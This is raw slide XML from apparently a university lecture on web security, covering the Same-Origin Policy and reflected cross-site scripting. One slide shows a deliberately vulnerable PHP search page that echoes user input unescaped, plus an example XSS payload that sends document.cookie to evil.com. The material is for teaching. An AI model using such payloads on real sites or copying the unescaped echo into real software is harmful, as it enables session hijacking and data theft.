              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390B121F-040E-DF48-B1E9-9D0100F0B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36453"/>
            <a:ext cx="8229600" cy="3604294"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3891690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dirty="0"/>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;meta charset="utf-8"&gt;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&lt;title&gt;CS 105 - Spring 2021&lt;/title&gt;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='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>fonts.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css?family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>=Source+Sans+Pro:300,300i,600,700,700i' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='stylesheet' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>'&gt;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='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>fonts.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css?family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>=Inconsolata:400,700,700i' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>='stylesheet' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>'&gt;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href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>bootstrap.min.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="stylesheet"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="stylesheet" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>main.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;header class="site-header"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>    &lt;div class="navbar navbar-inverse navbar-fixed-top"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>        &lt;div class="container-fluid"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>            &lt;div class="navbar-header"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                    &lt;span class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>-only"&gt;Toggle navigation&lt;/span&gt;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    &lt;span class="icon-bar"&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>                &lt;a class="navbar-brand" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="/courses/cs5430/2018sp/"&gt;CS 105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		  &lt;span class="hidden-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>xs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> hidden-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;: Computer Systems&lt;/span&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		  &lt;span class="hidden-md hidden-lg"&gt; - Spring 2021&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>		&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>            &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2919084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E0BB9-5223-C84A-BA02-08BD8C929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Web Pages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D3DE9-3441-4C4B-9898-EE90AD3CD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Server-Side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9F7526-DA63-844E-A3E0-3AEDB77593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PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go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6ADDAF-3227-A943-99A0-2AE80F4AC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Client-Side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1CE70F-3326-B748-B8A8-84EC08B82C9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6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Origin Policy (SOP)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for http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> accessed by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page2.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/page3.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:81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http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:80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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.html</a:t>
            </a:r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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com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dir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page.html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74" y="2094807"/>
            <a:ext cx="394960" cy="363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672" y="2905005"/>
            <a:ext cx="394481" cy="465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965" y="2534550"/>
            <a:ext cx="395835" cy="364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98" y="3327430"/>
            <a:ext cx="394481" cy="465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444" y="4294477"/>
            <a:ext cx="394481" cy="465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98" y="4700821"/>
            <a:ext cx="377856" cy="44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62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SOP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/>
              <a:t>Domain relaxation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-origin network requests: Access-Control-Allow-Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-origin client-side communication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Importing scripts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4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A3711-A920-B143-8DE1-B3F97B34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E7819A-AF05-714E-B7B8-A1A19C2DC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6036"/>
            <a:ext cx="8229600" cy="426512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9C3D36-0869-304B-B2CD-C8578127AAEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8269942" y="5665694"/>
            <a:ext cx="4572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509101-92AB-3441-8A25-DAB45AC2214D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1906036"/>
            <a:ext cx="8763000" cy="760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14F3DD-27F9-214C-A4EB-53B5F09CED4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="526943" y="2017364"/>
            <a:ext cx="8072034" cy="567234"/>
            <a:chOff x="526943" y="2017364"/>
            <a:chExt cx="8072034" cy="5672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6BE9783-3B56-1545-BA34-5FB0EDC4A910}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="526943" y="2057400"/>
              <a:ext cx="1441342" cy="527198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Application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743904-A45F-2646-B62C-9508E33AE032}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7157635" y="2023821"/>
              <a:ext cx="1441342" cy="527198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="63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/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Application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275D32F-2B75-0F45-8F00-A3840AFA0BF7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1968285" y="2320999"/>
              <a:ext cx="5194515" cy="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51533B-3C18-AC4C-A32F-58A06BDF47DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2038028" y="2017364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>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>messages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083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Scripting (XSS)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of code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends victim a script that runs on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com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812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543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5132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20574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6764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47053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046288" y="2073275"/>
            <a:ext cx="3211512" cy="6873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2046288" y="2455863"/>
            <a:ext cx="3440112" cy="773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" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2422525"/>
            <a:ext cx="2576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receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="41148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1122022">
            <a:off x="3049588" y="422275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click on link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 rot="1122022">
            <a:off x="2319338" y="4673600"/>
            <a:ext cx="2638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echo user input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2590800" y="2101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2209800" y="27590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rot="1068865">
            <a:off x="2714625" y="38576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44767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9" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="3046413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 rot="-709076">
            <a:off x="2846388" y="2901950"/>
            <a:ext cx="230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send valuable data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>
            <a:off x="2514600" y="3200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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="41592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4</a:t>
            </a:r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 rot="-709076">
            <a:off x="2970213" y="1873200"/>
            <a:ext cx="1654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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35014956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Search field on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php?term</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php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&lt;html&gt;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   &lt;title&gt; Search Results &lt;/title&gt;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   &lt;body&gt; Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a: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echo $_GET[term] ?&gt;: ...&lt;/body&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   &lt;/html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if victim instead clicks on:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="2" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.com?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> )  &lt;/script&gt;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7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Reflected XSS</a:t>
            </a:r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62000" y="2667000"/>
            <a:ext cx="8116137" cy="3810000"/>
            <a:chOff x="762000" y="2514600"/>
            <a:chExt cx="8116137" cy="3810000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800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5622174" y="2514600"/>
              <a:ext cx="3255963" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg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en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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1436688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98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135062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943600" y="754062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73863" y="41719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Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1475581"/>
            <a:ext cx="3363912" cy="43418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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21119711">
            <a:off x="2709070" y="1251971"/>
            <a:ext cx="219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user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2895600"/>
            <a:ext cx="4572000" cy="1447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TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
